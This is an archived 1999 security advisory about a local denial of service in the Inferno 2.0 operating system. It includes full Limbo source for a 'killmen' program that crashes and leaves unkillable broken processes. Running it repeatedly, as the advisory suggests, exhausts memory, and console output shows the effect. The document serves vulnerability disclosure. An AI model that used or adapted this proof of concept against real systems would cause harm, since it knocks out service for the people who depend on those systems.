InfernoJJFen.txt

1999-08-17T00:00:00
ID PACKETSTORM:17898
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
  
- J.J.F. / Hackers Team - Security Advisory  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Date: 1/18/1999  
Author: Conde Vampiro  
URL: http://www.jjf.org  
Aplication:  
Operating System: Inferno 2.0 over Windows platform.  
(It may also affect all other  
platforms running Inferno.)  
Danger: A user can produce a DoS (Denial of Service) in   
its own memory.  
  
-=-=-=-=-=-=-=-=  
Introduction  
-=-=-=-=-=-=-=-=  
  
A program written in Limbo can produce a denial of service  
consuming all the memory of the computer. Althrough the Inferno's   
commands to prevent this DoS are not able to stop this attack.  
  
-=-=-=-=-=-=-=-=  
In Detail  
-=-=-=-=-=-=-=-=  
  
Using the following program written in Limbo, we can consume all the  
memory of the platform we are running Inferno.  
  
------------ Source Code ---------------------------------------------------  
  
#   
# FILE: killmen.b  
# DATE: 11/10/98  
# CODER: Conde Vampiro of - J.J.F. / Hackers Team -  
# ABSTRACT: A DoS (Denial of service) in Limbo for Inferno O.S  
#  
# http://www.jjf.org - J.J.F. / Hackers Team -   
  
implement killmen;  
  
include "sys.m";  
sys: Sys;  
include "draw.m";  
  
i : int;  
men : con "DoS by Conde Vampiro";  
died := array[0] of int;   
kill := array[0] of int;  
  
killmen: module {  
init: fn(ctxt: ref Draw-> Context, nil: list of string);   
};  
  
init (ctxt: ref Draw-> Context, nil: list of string) {  
sys = load Sys Sys->PATH;  
sys->print("%s\n\n", men);   
for (i:=0;i<100;i++) {  
died[i]=kill[i];  
}  
}   
  
------------ EOF -------------------------------------------------------------  
  
If a user execute this program on an Inferno console, it will  
produce the following error:  
  
colmillo$ killmen  
DoS by Conde Vampiro  
  
[killmen] Broken: "array bounds error"  
17 "killmen":array bounds error  
colmillo$  
  
We can observe that the program "killmen" has produce an error and  
the shell tells us it's pid, in this case 17. If we execute the 'ps'  
command, it will show the following result:  
  
colmillo$ ps  
1 1 Conde Vampiro release 1K Sh[$Sys]  
6 6 inferno alt 19K Wm  
7 6 inferno release 4K Wm[$Sys]  
8 6 inferno release 4K Wm[$Sys]  
11 10 inferno recv 16K Plumb  
12 10 inferno alt 16K Plumb  
13 10 inferno alt 16K Plumb  
17 1 Conde Vampiro broken 10K killmen  
18 1 Conde Vampiro ready 1K Ps[$Sys]  
colmillo$   
  
The program "killmen" it's still remainning in memory, althrough it   
has produce an error. If we execute this program for a while, it will   
consume all the memory, this can be easely done using Mash, the shell   
script of Inferno.  
  
If the administrator has not execute the Inferno window interface   
or has not done the bind of the 'ps' command to the /prog directory, the   
"killmen" program will be hidden and the 'ps' will not show the processes   
in memory, but they are there.   
  
The 'slayer' command is used to kill "broken" processes but it will  
not kill "killmen". If we go to /prog directory we can see all the processes  
as files:  
  
colmillo$ cd /prog  
colmillo$ ls -l  
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 1   
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 11  
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 12  
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 13  
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 17  
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 22  
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 6  
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 7  
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 8  
colmillo$  
  
The 17 and 22 processes are the "killmen" program that are in memory   
and every time the program is executed it will create a new "broken" process  
in memory.  
  
-=-=-=-=-=-=-=-=  
Byes All  
conde@jjf.org  
  
http://www.jjf.org  
- J.J.F. / Hackers Team - Security Advisory  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=`